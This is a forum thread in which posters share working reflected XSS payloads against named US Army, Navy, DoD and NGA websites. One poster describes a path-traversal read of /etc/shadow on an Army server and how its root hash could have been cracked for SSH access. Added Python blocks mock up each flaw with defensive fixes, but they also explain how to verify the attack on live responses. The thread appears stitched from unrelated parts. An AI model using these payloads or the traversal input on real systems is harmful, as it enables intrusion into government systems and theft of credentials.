More .mil XSS (US Army + US Navy + Department of Defense + NGA)
#1
US Army (GET-based + POST-based):

-- GET:
https://www.qmo.amedd.army.mil/protected/QMVTC.php?dir="><svg/onload=prompt(/XSS/)>

-- POST:
http://rivergages.mvr.usace.army.mil/Wat...earch2.cfm

input:
fld_search=%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FXSSPOSED%2F%29%3E&Submit=Search

Department of Defense (Office for Secretary of Defense):

https://www.dmdc.osd.mil/appj/dwp/search...T%22%29%3E

US Navy (POST-based):

https://www.cnatra.navy.mil/pubs.asp

POST input:
searchTextbox="><svg%2Fonload%3Dconfirm('XSS')>

National Geospatial Intelligence Agency:

https://datahost.nga.mil/elist/email_esc.../script%3E
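The US Army POST payload above, worked through as an added example that is not code from the thread or from any of the sites listed. The search handler, the page template and the field handling are constructed stand-ins; only the shape of the POST body is taken from the post. It shows why the `"><svg/onload=...>` payload lands in the DOM when the parameter is reflected raw into an attribute, and why entity-encoding the value (quotes included) stops the breakout.

```python
"""Reflected XSS: a search parameter reflected raw vs. entity-encoded.

Added example, not code from the original thread or from any .mil site. The
handler, template and parameter handling are constructed assumptions; the POST
body has the same shape as the one in the thread.
"""
import html
from urllib.parse import parse_qs

# Constructed POST body in the shape posted in the thread (decodes to
# fld_search = "><svg/onload=confirm(/XSSPOSED/)>).
POST_BODY = (
    "fld_search=%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FXSSPOSED%2F%29%3E"
    "&Submit=Search"
)

# Assumed page template: the search term is echoed back into a value attribute.
PAGE = '<form><input name="fld_search" value="{value}"></form>'


def parse_search_param(body: str) -> str:
    """URL-decode the form body and return the search term (assumed field name)."""
    params = parse_qs(body, keep_blank_values=True)
    return params.get("fld_search", [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the term into the attribute with no output encoding.

    The leading '">' closes both the value attribute and the <input> tag, so
    the <svg onload=...> that follows becomes live markup.
    """
    return PAGE.format(value=term)


def render_hardened(term: str) -> str:
    """Same page, but the term is HTML-entity encoded with quote=True, so a
    double quote becomes &quot; and cannot terminate the attribute."""
    return PAGE.format(value=html.escape(term, quote=True))


def reflects_unencoded(response_html: str, term: str) -> bool:
    """Crude reflected-XSS check: the decoded payload appears verbatim in the
    response, meaning the attribute/tag breakout reached the markup."""
    return term in response_html


if __name__ == "__main__":
    term = parse_search_param(POST_BODY)
    print("decoded term:", term)
    print("vulnerable  :", render_vulnerable(term))
    print("hardened    :", render_hardened(term))
    print("reflected raw (vulnerable):", reflects_unencoded(render_vulnerable(term), term))
    print("reflected raw (hardened)  :", reflects_unencoded(render_hardened(term), term))
```

The same check works against a live response: submit the encoded body, URL-decode the term you sent, and look for it verbatim in the HTML; if it comes back entity-encoded (`&quot;&gt;&lt;svg...`) the sink is encoding its output, if it comes back byte-for-byte the attribute breakout has landed.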
#2
Pretty crazy to think that mil websites have XSS vulnerabilities :) Nice find!
#3
(12-18-2015, 04:00 PM)Insider Wrote: Pretty crazy to think that mil websites have XSS vulnerabilities :) Nice find!

Had something wayyyy more crazy in army.mil but it's patched now. Basically it was vulnerable to LFD at the following path: https://mesl.apgea.army.mil/mesl/account...etc/shadow

And yes, you could actually download the output of their shadow file. For some retarded reason that was beyond me they had their HTTP daemon running as a root user, no $6 hash types in /etc/shadow - just plain MD5, along with open SSH ports. Someone could have literally cracked the MD5 for the root user and SSH'd into the box @ uid0.
#4
(12-18-2015, 04:11 PM)MLT Wrote:
(12-18-2015, 04:00 PM)Insider Wrote: Pretty crazy to think that mil websites have XSS vulnerabilities :) Nice find!

Had something wayyyy more crazy in army.mil but it's patched now. Basically it was vulnerable to LFD at the following path: https://mesl.apgea.army.mil/mesl/account...etc/shadow

And yes, you could actually download the output of their shadow file. For some retarded reason that was beyond me they had their HTTP daemon running as a root user, no $6 hash types in /etc/shadow - just plain MD5, along with open SSH ports. Someone could have literally cracked the MD5 for the root user and SSH'd into the box @ uid0.

Damn! That is crazy, I don't even see many LFI/LFD vulnerabilities nowadays. Maybe I'm not looking well enough.
#5
(12-18-2015, 04:25 PM)Insider Wrote: Damn! That is crazy, I don't even see many LFI/LFD vulnerabilities nowadays. Maybe I'm not looking well enough.

I honestly wasn't expecting it to work. I just saw a ?filename= param while testing for XSS and was just like ../../../etc/shadow as input before even thinking. Was gobsmacked when it actually downloaded their shadow file.
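The LFD described in posts #3 and #5 (a `?filename=` parameter that accepted `../../../etc/shadow`), as an added example that is not code from the thread or from the site discussed. The download root, the parameter handling and the shadow line are constructed assumptions; only the shape of the input comes from the posts. It contrasts the naive join that lets the traversal climb out of the download directory with a containment check on the resolved path, and adds a prefix classifier for shadow hash fields, since the `$6$` versus `$1$` distinction in post #3 is exactly what that prefix tells you.

```python
"""Local file disclosure via a download parameter, and reading the hash
scheme of what it exposes.

Added example, not code from the thread or from the site it discusses. The
download root, parameter handling and shadow line are constructed; the input
'../../../etc/shadow' has the shape given in the thread.
"""
import os

DOWNLOAD_ROOT = "/srv/app/downloads"  # assumed directory the endpoint should serve


def vulnerable_path(root: str, filename: str) -> str:
    """Joins the user-supplied name straight onto the root.

    Nothing here stops '..' segments climbing above the root, and an absolute
    filename makes os.path.join discard the root altogether.
    """
    return os.path.normpath(os.path.join(root, filename))


def contained_path(root: str, filename: str):
    """Resolves the request and refuses anything whose real path is not under
    the root. Returns the resolved path, or None for a rejected request."""
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, filename))
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


def escapes_root(root: str, filename: str) -> bool:
    """True when the naive join would serve a file from outside the root."""
    real_root = os.path.realpath(root)
    naive = os.path.realpath(vulnerable_path(root, filename))
    return os.path.commonpath([real_root, naive]) != real_root


# crypt(3) '$id$' prefixes: '$6$' is sha512crypt, '$1$' is md5crypt.
SCHEMES = {
    "$1$": "md5crypt",
    "$2b$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def shadow_hash_scheme(shadow_line: str) -> str:
    """Names the hash scheme of one /etc/shadow line from the prefix of its
    second field; locked ('!', '*') or empty fields are reported as such."""
    field = shadow_line.split(":")[1]
    if field in ("", "*") or field.startswith("!"):
        return "locked-or-empty"
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "unknown"


if __name__ == "__main__":
    # Constructed shadow line; the salt and hash are placeholders, not real data.
    root_line = "root:$1$saltsalt$Y2J1Q3K0Y2J1Q3K0Y2J1Q3:16700:0:99999:7:::"
    print("naive join     :", vulnerable_path(DOWNLOAD_ROOT, "../../../etc/shadow"))
    print("contained check:", contained_path(DOWNLOAD_ROOT, "../../../etc/shadow"))
    print("ordinary file  :", contained_path(DOWNLOAD_ROOT, "report.pdf"))
    print("root hash      :", shadow_hash_scheme(root_line))
```

The containment check deliberately compares real paths rather than stripping `..` from the input, so symlinks inside the download directory and absolute filenames are rejected by the same test; and because the HTTP daemon in the thread ran as root, the file system itself offered no second line of defence, which is why the path check has to be the one that holds.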
#6
Yet another found in the National Geospatial Intelligence Agency:

http://msi.nga.mil/NGAPortal/MSI.portal?...main%29%3E
#7
And another in the Department of Defense (this is an interesting vector):

http://www.militaryinstallations.dod.mil...omain%29//